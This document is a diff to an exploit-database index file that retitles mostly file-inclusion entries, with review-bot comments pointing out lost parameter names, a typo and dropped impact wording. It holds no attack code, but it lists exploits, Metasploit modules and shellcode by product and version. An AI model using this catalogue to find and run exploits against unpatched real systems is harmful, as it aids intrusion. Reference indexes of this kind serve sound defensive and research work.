+25971,platforms/php/webapps/25971.txt,"Cuppa CMS - 'alertConfigField.php' Remote / Local File Inclusion",2013-06-05,"CWH Underground",php,webapps,0
 25972,platforms/windows/dos/25972.py,"PEStudio 3.69 - Denial of Service",2013-06-05,"Debasish Mandal",windows,dos,0
 25973,platforms/php/webapps/25973.txt,"Ruubikcms 1.1.1 - (tinybrowser.php folder Parameter) Directory Traversal",2013-06-05,expl0i13r,php,webapps,0
 25974,platforms/osx/dos/25974.txt,"Apple Mac OSX Server - DirectoryService Buffer Overflow",2013-06-05,"Core Security",osx,dos,0
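Review bot: The rewritten `+25971` title drops the `urlConfig` parameter name that the old title carried, while the other renames in this commit keep both the script and the parameter (for example `'browse.php' show_course Parameter` and `'body_header.inc.php' section Parameter`), so this entry ends up less specific than its neighbours rather than normalized to the same convention. The parameter name is the most useful search key for an inclusion bug, and the old title is the only place in this file that records it. Suggest `"Cuppa CMS - 'alertConfigField.php' urlConfig Parameter Remote / Local File Inclusion"` to match the convention used by the other entries; the commit description's old/new title list would need to be regenerated to match.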
@@ -23209,7 +23209,7 @@ id,file,description,date,author,platform,type,port
 26296,platforms/php/webapps/26296.txt,"PHPMyFAQ 1.5.1 - Local File Inclusion",2005-08-23,rgod,php,webapps,0
 26009,platforms/php/webapps/26009.txt,"AfterLogic WebMail Lite PHP 7.0.1 - Cross-Site Request Forgery",2013-06-07,"Pablo Ribeiro",php,webapps,0
 26010,platforms/windows/dos/26010.py,"Quick TFTP Server 2.2 - Denial of Service",2013-06-07,npn,windows,dos,0
-26012,platforms/windows/remote/26012.rb,"Novell Zenworks Mobile Device Managment - Local File Inclusion (Metasploit)",2013-06-07,Metasploit,windows,remote,80
+26012,platforms/windows/remote/26012.rb,"Novell Zenworks Mobile Device Managment 2.6.1 / 2.7.0 - Local File Inclusion (Metasploit)",2013-06-07,Metasploit,windows,remote,80
 26013,platforms/multiple/remote/26013.txt,"Oracle Forms 6i/9i/4.5.10/5.0/6.0.8/10g Services - Unauthorized Form Execution",2005-07-19,"Alexander Kornbrust",multiple,remote,0
 26014,platforms/php/webapps/26014.txt,"FForm Sender 1.0 - Processform.php3 Name Cross-Site Scripting",2005-07-19,rgod,php,webapps,0
 26015,platforms/php/webapps/26015.txt,"Form Sender 1.0 - Processform.php3 Failed Cross-Site Scripting",2005-07-19,rgod,php,webapps,0
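Review bot: The new `+26012` title still carries the misspelling `Managment`, so the version bump rewrites the description but leaves a typo that a search for "Management" will miss; the same file spells the vendor product line `Novell ZENworks Patch Management` in entries 26429 and 26430. Since this line is already being rewritten, correct it in the same commit: `26012,platforms/windows/remote/26012.rb,"Novell ZENworks Mobile Device Management 2.6.1 / 2.7.0 - Local File Inclusion (Metasploit)",2013-06-07,Metasploit,windows,remote,80`. The commit description quotes the misspelled old and new titles as well, so it should be regenerated after the fix.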
@@ -23325,7 +23325,7 @@ id,file,description,date,author,platform,type,port
 26122,platforms/php/webapps/26122.txt,"FunkBoard 0.66 - register.php Multiple Parameter Cross-Site Scripting",2005-08-08,rgod,php,webapps,0
 26123,platforms/multiple/remote/26123.rb,"Java - Web Start Double Quote Injection Remote Code Execution (Metasploit)",2013-06-11,Rh0,multiple,remote,0
 26124,platforms/php/webapps/26124.txt,"WordPress Plugin WP-SendSms 1.0 - Multiple Vulnerabilities",2013-06-11,expl0i13r,php,webapps,0
-26125,platforms/php/webapps/26125.txt,"Weathermap 0.97c - (editor.php mapname Parameter) Local File Inclusion",2013-06-11,"Anthony Dubuissez",php,webapps,0
+26125,platforms/php/webapps/26125.txt,"Weathermap 0.97c - 'mapname' Parameter Local File Inclusion",2013-06-11,"Anthony Dubuissez",php,webapps,0
 26126,platforms/php/webapps/26126.txt,"NanoBB 0.7 - Multiple Vulnerabilities",2013-06-11,"CWH Underground",php,webapps,0
 26127,platforms/php/webapps/26127.txt,"TriggerTG TClanPortal 3.0 - Multiple SQL Injections",2005-08-09,admin@batznet.com,php,webapps,0
 26128,platforms/osx/dos/26128.html,"Apple Safari 1.3 Web Browser - JavaScript Invalid Address Denial of Service",2005-08-09,"Patrick Webster",osx,dos,0
@@ -23455,7 +23455,7 @@ id,file,description,date,author,platform,type,port
 26254,platforms/php/webapps/26254.txt,"Land Down Under 800/801 - plug.php e Parameter SQL Injection",2005-09-13,"GroundZero Security Research",php,webapps,0
 26255,platforms/php/webapps/26255.php,"Mail-it Now! Upload2Server 1.5 - Arbitrary File Upload",2005-09-13,rgod,php,webapps,0
 26256,platforms/cgi/webapps/26256.txt,"MIVA Merchant 5 - Merchant.MVC Cross-Site Scripting",2005-09-14,admin@hyperconx.com,cgi,webapps,0
-26257,platforms/php/webapps/26257.txt,"ATutor 1.5.1 - password_reminder.php SQL Injection",2005-09-14,rgod,php,webapps,0
+26257,platforms/php/webapps/26257.txt,"ATutor 1.5.1 - 'password_reminder.php' SQL Injection",2005-09-14,rgod,php,webapps,0
 26258,platforms/php/webapps/26258.txt,"ATutor 1.5.1 - Chat Logs Remote Information Disclosure",2005-09-14,rgod,php,webapps,0
 26259,platforms/php/webapps/26259.txt,"Noah's Classifieds 1.2/1.3 - 'index.php' SQL Injection",2005-09-14,trueend5,php,webapps,0
 26260,platforms/php/webapps/26260.txt,"TWiki TWikiUsers - Arbitrary Command Execution",2005-09-14,B4dP4nd4,php,webapps,0
@@ -23612,9 +23612,9 @@ id,file,description,date,author,platform,type,port
 26428,platforms/php/webapps/26428.html,"Search Enhanced Module 1.1/2.0 for PHP-Nuke - HTML Injection",2005-10-26,bhfh01,php,webapps,0
 26429,platforms/asp/webapps/26429.txt,"Novell ZENworks Patch Management 6.0.52 - computers/default.asp Direction Parameter SQL Injection",2005-10-27,"Dennis Rand",asp,webapps,0
 26430,platforms/asp/webapps/26430.txt,"Novell ZENworks Patch Management 6.0.52 - reports/default.asp Multiple Parameter SQL Injection",2005-10-27,"Dennis Rand",asp,webapps,0
-26431,platforms/php/webapps/26431.txt,"ATutor 1.x - forum.inc.php Arbitrary Command Execution",2005-10-27,"Andreas Sandblad",php,webapps,0
-26432,platforms/php/webapps/26432.txt,"ATutor 1.x - body_header.inc.php section Parameter Local File Inclusion",2005-10-27,"Andreas Sandblad",php,webapps,0
-26433,platforms/php/webapps/26433.txt,"ATutor 1.x - print.php section Parameter Remote File Inclusion",2005-10-27,"Andreas Sandblad",php,webapps,0
+26431,platforms/php/webapps/26431.txt,"ATutor 1.x - 'forum.inc.php' Arbitrary Command Execution",2005-10-27,"Andreas Sandblad",php,webapps,0
+26432,platforms/php/webapps/26432.txt,"ATutor 1.x - 'body_header.inc.php' section Parameter Local File Inclusion",2005-10-27,"Andreas Sandblad",php,webapps,0
+26433,platforms/php/webapps/26433.txt,"ATutor 1.x - 'print.php' section Parameter Remote File Inclusion",2005-10-27,"Andreas Sandblad",php,webapps,0
 26434,platforms/php/webapps/26434.txt,"PBLang 4.65 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-27,abducter,php,webapps,0
 26435,platforms/asp/webapps/26435.txt,"ASP Fast Forum - error.asp Cross-Site Scripting",2005-10-27,syst3m_f4ult,asp,webapps,0
 26436,platforms/php/webapps/26436.txt,"MG2 0.5.1 - Authentication Bypass",2005-10-29,"Preben Nylokken",php,webapps,0
@@ -25296,10 +25296,10 @@ id,file,description,date,author,platform,type,port
 28273,platforms/php/webapps/28273.txt,"PHPSavant Savant2 - Stylesheet.php MosConfig_absolute_path Parameter Remote File Inclusion",2006-07-25,botan,php,webapps,0
 28174,platforms/php/webapps/28174.txt,"Moodle 2.3.8/2.4.5 - Multiple Vulnerabilities",2013-09-09,"Ciaran McNally",php,webapps,0
 28175,platforms/linux/webapps/28175.txt,"Sophos Web Protection Appliance - Multiple Vulnerabilities",2013-09-09,"Core Security",linux,webapps,0
-28176,platforms/php/webapps/28176.txt,"ATutor 1.5.x - create_course.php Multiple Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0
-28177,platforms/php/webapps/28177.txt,"ATutor 1.5.x - documentation/admin/index.php Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0
-28178,platforms/php/webapps/28178.txt,"ATutor 1.5.x - password_reminder.php forgot Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0
-28179,platforms/php/webapps/28179.txt,"ATutor 1.5.x - users/browse.php cat Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0
+28176,platforms/php/webapps/28176.txt,"ATutor 1.5.x - 'create_course.php' Multiple Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0
+28177,platforms/php/webapps/28177.txt,"ATutor 1.5.x - 'documentation/admin/index.php' Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0
+28178,platforms/php/webapps/28178.txt,"ATutor 1.5.x - 'password_reminder.php' forgot Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0
+28179,platforms/php/webapps/28179.txt,"ATutor 1.5.x - 'users/browse.php' cat Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0
 28180,platforms/php/webapps/28180.txt,"ATutor 1.5.x - admin/fix_content.php submit Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0
 28181,platforms/linux/remote/28181.c,"AdPlug 2.0 - Multiple Remote File Buffer Overflow 
Vulnerabilities",2006-07-06,"Luigi Auriemma",linux,remote,0
 28182,platforms/multiple/dos/28182.java,"MICO Object Key 2.3.12 - Remote Denial of Service",2006-07-06,tuergeist,multiple,dos,0
@@ -26582,7 +26582,7 @@ id,file,description,date,author,platform,type,port
 30029,platforms/php/webapps/30029.txt,"SonicBB 1.0 - search.php Cross-Site Scripting",2007-05-14,"Jesper Jurcenoks",php,webapps,0
 30031,platforms/ios/webapps/30031.txt,"Imagam iFiles 1.16.0 iOS - Multiple Web Vulnerabilities",2013-12-04,Vulnerability-Lab,ios,webapps,0
 30032,platforms/windows/local/30032.rb,"Steinberg MyMp3PRO 5.0 - Buffer Overflow SEH Exploit (DEP Bypass with ROP)",2013-12-04,metacom,windows,local,0
-30085,platforms/linux/webapps/30085.txt,"Zimbra - Privilegie Escalation (via Local File Inclusion)",2013-12-06,rubina119,linux,webapps,0
+30085,platforms/linux/webapps/30085.txt,"Zimbra 2009-2013 - Local File Inclusion",2013-12-06,rubina119,linux,webapps,0
 30035,platforms/php/webapps/30035.txt,"SonicBB 1.0 - Multiple SQL Injections",2007-05-14,"Jesper Jurcenoks",php,webapps,0
 30036,platforms/php/webapps/30036.html,"WordPress Plugin Akismet 2.1.3 - Unspecified",2007-05-14,"David Kierznowski",php,webapps,0
 30037,platforms/windows/remote/30037.txt,"Caucho Resin 3.1 - Encoded Space Request Full Path Disclosure",2007-05-15,"Derek Abdine",windows,remote,0
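Review bot: The context record for 28181 (AdPlug 2.0) is printed with its quoted description broken across two physical lines between "Buffer Overflow" and "Vulnerabilities". The hunk header's 10-line count suggests git treats it as a single record, so this may only be a rendering artifact of this page, but if the stored CSV really contains a line break inside that field, line-oriented consumers of the index (grep-style search tools) will return a truncated title and an orphan second line. Worth confirming against the stored file and, if real, joining the field onto one line as `"AdPlug 2.0 - Multiple Remote File Buffer Overflow Vulnerabilities"`.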
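Review bot: The new title for 30085 drops the impact from the old one — "Privilegie Escalation (via Local File Inclusion)" becomes plain "Local File Inclusion" — so anyone triaging the index by title now sees only the primitive, not that the entry documents an escalation built on it; the same happens to 35578 in the 32148 hunk, where "Remote Code Execution (via Local File Inclusion + SQL Injection)" becomes "SQL Injection / Local File Inclusion". The spelling fix was warranted, but 35588 in the 32158 hunk shows the house pattern that keeps both, "Local File Inclusion to Remote Code Execution". A title such as `"Zimbra 2009-2013 - Local File Inclusion to Privilege Escalation"` would preserve the version information this commit adds without losing the impact.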
@@ -27439,7 +27439,7 @@ id,file,description,date,author,platform,type,port
 30468,platforms/windows/local/30468.pl,"RealNetworks RealPlayer 16.0.3.51/16.0.2.32 - '.rmp' Version Attribute Buffer Overflow",2013-12-24,"Gabor Seljan",windows,local,0
 30470,platforms/unix/remote/30470.rb,"Synology DiskStation Manager - SLICEUPLOAD Remote Command Execution (Metasploit)",2013-12-24,Metasploit,unix,remote,5000
 30471,platforms/linux/remote/30471.rb,"OpenSIS 'modname' - PHP Code Execution (Metasploit)",2013-12-24,Metasploit,linux,remote,80
-30472,platforms/linux/remote/30472.rb,"Zimbra Collaboration Server - Local File Inclusion (Metasploit)",2013-12-24,Metasploit,linux,remote,7071
+30472,platforms/linux/remote/30472.rb,"Zimbra Collaboration Server 7.2.2 / 8.0.2 - Local File Inclusion (Metasploit)",2013-12-24,Metasploit,linux,remote,7071
 30473,platforms/unix/remote/30473.rb,"HP SiteScope issueSiebelCmd - Remote Code Execution (Metasploit)",2013-12-24,Metasploit,unix,remote,8080
 30474,platforms/windows/remote/30474.rb,"Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit)",2013-12-24,Metasploit,windows,remote,0
 30475,platforms/cgi/webapps/30475.txt,"Synology DSM 4.3-3810 - Directory Traversal",2013-12-24,"Andrea Fabrizi",cgi,webapps,80
@@ -29133,7 +29133,7 @@ id,file,description,date,author,platform,type,port
 32210,platforms/windows/remote/32210.rb,"Yokogawa CENTUM CS 3000 - BKBCopyD.exe Buffer Overflow (Metasploit)",2014-03-12,Metasploit,windows,remote,20111
 32211,platforms/php/webapps/32211.txt,"LuxCal 3.2.2 - (Cross-Site Request Forgery/Blind SQL Injection) Multiple Vulnerabilities",2014-03-12,"TUNISIAN CYBER",php,webapps,80
 32212,platforms/asp/webapps/32212.txt,"Procentia IntelliPen 1.1.12.1520 - data.aspx Blind SQL Injection",2014-03-12,Portcullis,asp,webapps,80
-32213,platforms/php/webapps/32213.txt,"Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA - (browse.php file Parameter) Local File Inclusion",2014-03-12,Portcullis,php,webapps,80
+32213,platforms/php/webapps/32213.txt,"Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion",2014-03-12,Portcullis,php,webapps,80
 32217,platforms/php/webapps/32217.txt,"Linkspider 1.08 - Multiple Remote File Inclusion",2008-08-08,"Rohit Bansal",php,webapps,0
 32218,platforms/php/webapps/32218.txt,"Domain Group Network GooCMS 1.02 - 'index.php' Cross-Site Scripting",2008-08-11,ahmadbaby,php,webapps,0
 32219,platforms/php/webapps/32219.txt,"Kayako SupportSuite 3.x - visitor/index.php sessionid Parameter Cross-Site Scripting",2008-08-11,"James Bercegay",php,webapps,0
@@ -29367,11 +29367,11 @@ id,file,description,date,author,platform,type,port
 32501,platforms/multiple/local/32501.txt,"NXP Semiconductors MIFARE Classic Smartcard - Multiple Security Weaknesses",2008-10-21,"Flavio D. Garcia",multiple,local,0
 32502,platforms/php/webapps/32502.txt,"Getsimple CMS 3.3.1 - Persistent Cross-Site Scripting",2014-03-25,"Jeroen - IT Nerdbox",php,webapps,0
 32503,platforms/php/webapps/32503.txt,"Cart Engine 3.0.0 - Remote Code Execution",2014-03-25,LiquidWorm,php,webapps,0
-32504,platforms/php/webapps/32504.txt,"Cart Engine 3.0.0 - (task.php) Local File Inclusion",2014-03-25,LiquidWorm,php,webapps,0
+32504,platforms/php/webapps/32504.txt,"Cart Engine 3.0.0 - 'task.php' Local File Inclusion",2014-03-25,LiquidWorm,php,webapps,0
 32505,platforms/php/webapps/32505.txt,"Cart Engine 3.0.0 - Database Backup Disclosure",2014-03-25,LiquidWorm,php,webapps,0
 32506,platforms/php/webapps/32506.txt,"Kemana Directory 1.5.6 - kemana_admin_passwd Cookie User Password Hash Disclosure",2014-03-25,LiquidWorm,php,webapps,0
 32507,platforms/php/webapps/32507.txt,"Kemana Directory 1.5.6 - Remote Code Execution",2014-03-25,LiquidWorm,php,webapps,0
-32508,platforms/php/webapps/32508.txt,"Kemana Directory 1.5.6 - (run Parameter) Local File Inclusion",2014-03-25,LiquidWorm,php,webapps,0
+32508,platforms/php/webapps/32508.txt,"Kemana Directory 1.5.6 - 'task.php' Local File Inclusion",2014-03-25,LiquidWorm,php,webapps,0
 32509,platforms/php/webapps/32509.txt,"Kemana Directory 1.5.6 - Database Backup Disclosure",2014-03-25,LiquidWorm,php,webapps,0
 32510,platforms/php/webapps/32510.txt,"Kemana Directory 1.5.6 - (qvc_init()) Cookie Poisoning CAPTCHA Bypass Exploit",2014-03-25,LiquidWorm,php,webapps,0
 32511,platforms/php/webapps/32511.txt,"qEngine CMS 6.0.0 - Multiple Vulnerabilities",2014-03-25,LiquidWorm,php,webapps,80
@@ -31317,7 +31317,7 @@ id,file,description,date,author,platform,type,port
 34666,platforms/php/webapps/34666.py,"ALCASAR 2.8.1 - Remote Root Code Execution",2014-09-15,eF,php,webapps,80
 34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Connect Back Shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0
 34668,platforms/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)",2014-09-15,"Daniele Linguaglossa",windows,remote,80
-34669,platforms/multiple/remote/34669.rb,"Railo - Remote File Inclusion (Metasploit)",2014-09-15,Metasploit,multiple,remote,80
+34669,platforms/multiple/remote/34669.rb,"Railo 4.2.1 - Remote File Inclusion (Metasploit)",2014-09-15,Metasploit,multiple,remote,80
 34670,platforms/multiple/remote/34670.rb,"ManageEngine Eventlog Analyzer - Arbitrary File Upload (Metasploit)",2014-09-15,Metasploit,multiple,remote,8400
 34671,platforms/java/remote/34671.rb,"SolarWinds Storage Manager - Authentication Bypass (Metasploit)",2014-09-15,Metasploit,java,remote,9000
 34672,platforms/linux/webapps/34672.txt,"CacheGuard-OS 5.7.7 - Cross-Site Request Forgery",2014-09-15,"William Costa",linux,webapps,8090
@@ -31393,7 +31393,7 @@ id,file,description,date,author,platform,type,port
 34744,platforms/php/webapps/34744.txt,"YourFreeWorld Ultra Classifieds - listads.php Multiple Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0
 34745,platforms/php/webapps/34745.txt,"YourFreeWorld Ultra Classifieds - subclass.php cname Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0
 34746,platforms/php/webapps/34746.txt,"Web TV - 'chn' Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0
-34747,platforms/php/webapps/34747.txt,"LittleSite 0.1 - 'file' Parameter Local File Inclusion",2014-09-23,Eolas_Gadai,php,webapps,0
+34747,platforms/php/webapps/34747.txt,"LittleSite 0.1 - 'index.php' Local File Inclusion",2014-09-23,Eolas_Gadai,php,webapps,0
 40338,platforms/php/webapps/40338.txt,"PHPIPAM 1.2.1 - Multiple Vulnerabilities",2016-09-06,"Saeed reza Zamanian",php,webapps,80
 34748,platforms/php/webapps/34748.txt,"Classified Linktrader Script - 'addlink.php' SQL Injection",2009-07-21,Moudi,php,webapps,0
 34749,platforms/php/webapps/34749.txt,"CJ Dynamic Poll Pro 2.0 - 'admin_index.php' Cross-Site Scripting",2009-07-21,Moudi,php,webapps,0
@@ -31408,7 +31408,7 @@ id,file,description,date,author,platform,type,port
 34760,platforms/php/webapps/34760.txt,"Restaurant Script (PizzaInn Project) - Persistent Cross-Site Scripting",2014-09-24,"Kenneth F. Belva",php,webapps,80
 34761,platforms/php/webapps/34761.txt,"webEdition 6.3.8.0 (SVN-Revision: 6985) - Directory Traversal",2014-09-24,"High-Tech Bridge SA",php,webapps,80
 34762,platforms/php/webapps/34762.txt,"WordPress Plugin Login Widget With ShortCode 3.1.1 - Multiple Vulnerabilities",2014-09-25,dxw,php,webapps,80
-34763,platforms/php/webapps/34763.txt,"OSClass 3.4.1 - (index.php file Parameter) Local File Inclusion",2014-09-25,Netsparker,php,webapps,80
+34763,platforms/php/webapps/34763.txt,"OSClass 3.4.1 - 'index.php' Local File Inclusion",2014-09-25,Netsparker,php,webapps,80
 34764,platforms/php/webapps/34764.txt,"Cart Engine 3.0 - Multiple Vulnerabilities",2014-09-25,"Quantum Leap",php,webapps,80
 34765,platforms/linux/remote/34765.txt,"GNU Bash - Environment Variable Command Injection (Shellshock)",2014-09-25,"Stephane Chazelas",linux,remote,0
 34766,platforms/linux/remote/34766.php,"Bash - Environment Variables Code Injection (Shellshock)",2014-09-25,"Prakhar Prasad & Subho Halder",linux,remote,80
@@ -31664,7 +31664,7 @@ id,file,description,date,author,platform,type,port
 35049,platforms/asp/webapps/35049.txt,"Techno Dreams FAQ Manager Package 1.0 - 'faqlist.asp' SQL Injection",2010-12-04,R4dc0re,asp,webapps,0
 35050,platforms/php/webapps/35050.txt,"Alguest 1.1 - 'start' Parameter SQL Injection",2010-12-06,"Aliaksandr Hartsuyeu",php,webapps,0
 35051,platforms/windows/remote/35051.txt,"Freefloat FTP Server - Directory Traversal",2010-12-06,Pr0T3cT10n,windows,remote,0
-35052,platforms/php/webapps/35052.txt,"Magento Server MAGMI Plugin - Remote File Inclusion",2014-10-25,"Parvinder Bhasin",php,webapps,0
+35052,platforms/php/webapps/35052.txt,"Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion",2014-10-25,"Parvinder Bhasin",php,webapps,0
 35566,platforms/php/webapps/35566.txt,"Yaws-Wiki 1.88-1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2011-04-04,"Michael Brooks",php,webapps,0
 35055,platforms/windows/remote/35055.py,"Microsoft Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060)",2014-10-25,"Mike Czumak",windows,remote,0
 35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Directory Traversal",2014-10-25,"XLabs Security",hardware,webapps,0
@@ -32148,7 +32148,7 @@ id,file,description,date,author,platform,type,port
 35575,platforms/php/webapps/35575.txt,"PrestaShop 1.3.6 - 'cms.php' Remote File Inclusion",2011-04-08,KedAns-Dz,php,webapps,0
 35576,platforms/asp/webapps/35576.txt,"Omer Portal 3.220060425 - 'arama_islem.asp' Cross-Site Scripting",2011-04-07,"kurdish hackers team",asp,webapps,0
 35577,platforms/php/webapps/35577.txt,"vtiger CRM 5.2.1 - 'vtigerservice.php' Cross-Site Scripting",2011-04-07,"AutoSec Tools",php,webapps,0
-35578,platforms/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 - Remote Code Execution (via Local File Inclusion + SQL Injection)",2014-12-19,Wireghoul,php,webapps,0
+35578,platforms/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 - SQL Injection / Local File Inclusion",2014-12-19,Wireghoul,php,webapps,0
 35579,platforms/php/webapps/35579.txt,"miniBB 3.1 - Blind SQL Injection",2014-12-19,"Kacper Szurek",php,webapps,80
 35580,platforms/linux/dos/35580.rb,"Ettercap 0.8.0 < 0.8.1 - Multiple Denial of Service Vulnerabilities",2014-12-19,"Nick Sampanis",linux,dos,0
 35581,platforms/linux/remote/35581.rb,"Varnish Cache CLI Interface - Remote Code Execution (Metasploit)",2014-12-19,"Patrick Webster",linux,remote,6082
@@ -32158,7 +32158,7 @@ id,file,description,date,author,platform,type,port
 35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind 4444/TCP Port Shellcode (81 bytes / 96 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0
 35585,platforms/php/webapps/35585.txt,"Codiad 2.4.3 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80
 35587,platforms/lin_x86-64/shellcode/35587.c,"Linux/x86-64 - Reverse TCP connect Shellcode (77 to 85 bytes / 90 to 98 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0
-35588,platforms/php/remote/35588.rb,"Lotus Mail Encryption Server (Protector for Mail) - Local File Inclusion to Remote Code Execution (Metasploit)",2014-12-22,"Patrick Webster",php,remote,9000
+35588,platforms/php/remote/35588.rb,"Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion to Remote Code Execution (Metasploit)",2014-12-22,"Patrick Webster",php,remote,9000
 35589,platforms/windows/dos/35589.py,"Notepad++ 6.6.9 - Buffer Overflow",2014-12-22,TaurusOmar,windows,dos,0
 35590,platforms/windows/local/35590.txt,"BitRaider Streaming Client 1.3.3.4098 - Privilege Escalation",2014-12-23,LiquidWorm,windows,local,0
 35591,platforms/php/webapps/35591.txt,"PHPMyRecipes 1.2.2 - (browse.php category Parameter) SQL Injection",2014-12-23,"Manish Tanwar",php,webapps,80
@@ -32566,7 +32566,7 @@ id,file,description,date,author,platform,type,port
 36059,platforms/php/webapps/36059.txt,"Exponent CMS 2.3.1 - Multiple Cross-Site Scripting Vulnerabilities",2015-02-12,"Mayuresh Dani",php,webapps,80
 36026,platforms/php/webapps/36026.txt,"u5CMS 3.9.3 - (deletefile.php) Arbitrary File Deletion",2015-02-09,LiquidWorm,php,webapps,0
 36027,platforms/php/webapps/36027.txt,"u5CMS 3.9.3 - Multiple SQL Injections",2015-02-09,LiquidWorm,php,webapps,0
-36028,platforms/php/webapps/36028.txt,"u5CMS 3.9.3 - (thumb.php) Local File Inclusion",2015-02-09,LiquidWorm,php,webapps,0
+36028,platforms/php/webapps/36028.txt,"u5CMS 3.9.3 - 'thumb.php' Local File Inclusion",2015-02-09,LiquidWorm,php,webapps,0
 36029,platforms/php/webapps/36029.txt,"u5CMS 3.9.3 - Multiple Persistent Cross-Site Scripting / Reflected Cross-Site Scripting Vulnerabilities",2015-02-09,LiquidWorm,php,webapps,0
 36031,platforms/php/webapps/36031.txt,"StaMPi - Local File Inclusion",2015-02-09,"e . V . E . L",php,webapps,0
 36058,platforms/php/webapps/36058.txt,"WordPress Plugin Video Gallery 2.7.0 - SQL Injection",2015-02-12,"Claudio Viviani",php,webapps,0
@@ -34447,8 +34447,8 @@ id,file,description,date,author,platform,type,port
 38036,platforms/osx/local/38036.rb,"Apple Mac OSX Entitlements - 'Rootpipe' Privilege Escalation (Metasploit)",2015-08-31,Metasploit,osx,local,0
 38037,platforms/php/webapps/38037.html,"Open-Realty 2.5.8 - Cross-Site Request Forgery",2012-11-16,"Aung Khant",php,webapps,0
 38038,platforms/multiple/dos/38038.txt,"Splunk 4.3.1 - Denial of Service",2012-11-19,"Alexander Klink",multiple,dos,0
-38039,platforms/php/webapps/38039.txt,"openSIS - 'modname' Parameter Local File Inclusion",2012-11-20,"Julian Horoszkiewicz",php,webapps,0
-38040,platforms/php/webapps/38040.txt,"ATutor - 'tool_file' Parameter Local File Inclusion",2012-11-16,"Julian Horoszkiewicz",php,webapps,0
+38039,platforms/php/webapps/38039.txt,"openSIS 5.1 - 'ajax.php' Local File Inclusion",2012-11-20,"Julian Horoszkiewicz",php,webapps,0
+38040,platforms/php/webapps/38040.txt,"ATutor 2.1 - 'tool_file' Parameter Local File Inclusion",2012-11-16,"Julian Horoszkiewicz",php,webapps,0
 38041,platforms/php/webapps/38041.txt,"WordPress Theme Madebymilk - 'id' Parameter SQL Injection",2012-11-20,"Ashiyane Digital Security Team",php,webapps,0
 38042,platforms/php/webapps/38042.txt,"dotProject 2.1.x - 'index.php' Multiple Parameter SQL Injection",2012-11-21,"High-Tech Bridge",php,webapps,0
 38043,platforms/php/webapps/38043.txt,"dotProject 2.1.x - 'index.php' Multiple Parameter Cross-Site Scripting",2012-11-21,"High-Tech Bridge",php,webapps,0
@@ -34856,7 +34856,7 @@ id,file,description,date,author,platform,type,port
 38474,platforms/windows/local/38474.txt,"Microsoft Windows 10 - Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111)",2015-10-15,"Google Security Research",windows,local,0
 38478,platforms/php/webapps/38478.txt,"Sosci Survey - Multiple Security Vulnerabilities",2013-04-17,"T. Lazauninkas",php,webapps,0
 38479,platforms/asp/webapps/38479.txt,"Matrix42 Service Store - 'default.aspx' Cross-Site Scripting",2013-03-06,43zsec,asp,webapps,0
-38480,platforms/php/webapps/38480.txt,"Fork CMS - 'file' Parameter Local File Inclusion",2013-04-18,"Rafay Baloch",php,webapps,0
+38480,platforms/php/webapps/38480.txt,"Fork CMS - 'js.php' Local File Inclusion",2013-04-18,"Rafay Baloch",php,webapps,0
 38481,platforms/hardware/remote/38481.html,"D-Link DIR-865L - Cross-Site Request Forgery",2013-04-19,"Jacob Holcomb",hardware,remote,0
 38482,platforms/php/webapps/38482.txt,"Crafty Syntax Live Help 3.1.2 - Remote File Inclusion / Full Path Disclosure",2013-04-19,ITTIHACK,php,webapps,0
 38483,platforms/hardware/dos/38483.txt,"TP-Link TL-WR741N / TL-WR741ND Routers - Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,hardware,dos,0
@@ -34934,7 +34934,7 @@ id,file,description,date,author,platform,type,port
 38560,platforms/php/webapps/38560.txt,"Caucho Resin - '/resin-admin/' URI Cross-Site Scripting",2013-06-07,"Gjoko Krstic",php,webapps,0
 38561,platforms/php/webapps/38561.txt,"Caucho Resin - 'index.php' logout Parameter Cross-Site Scripting",2013-06-07,"Gjoko Krstic",php,webapps,0
 38562,platforms/php/webapps/38562.txt,"HP Insight Diagnostics - Remote Code Injection",2013-06-10,"Markus Wulftange",php,webapps,0
-38563,platforms/php/webapps/38563.txt,"HP Insight Diagnostics - Local File Inclusion",2013-06-10,"Markus Wulftange",php,webapps,0
+38563,platforms/php/webapps/38563.txt,"HP Insight Diagnostics 9.4.0.4710 - Local File Inclusion",2013-06-10,"Markus Wulftange",php,webapps,0
 38564,platforms/windows/dos/38564.py,"Sam Spade 1.14 - Scan From IP Address Field SEH Overflow Crash (PoC)",2015-10-29,"Luis Martínez",windows,dos,0
 38565,platforms/php/webapps/38565.txt,"Joomla! Component JNews (com_jnews) 8.5.1 - SQL Injection",2015-10-29,"Omer Ramić",php,webapps,80
 38566,platforms/hardware/dos/38566.py,"NetUSB - Kernel Stack Buffer Overflow",2015-10-29,"Adrián Ruiz Bermudo",hardware,dos,0
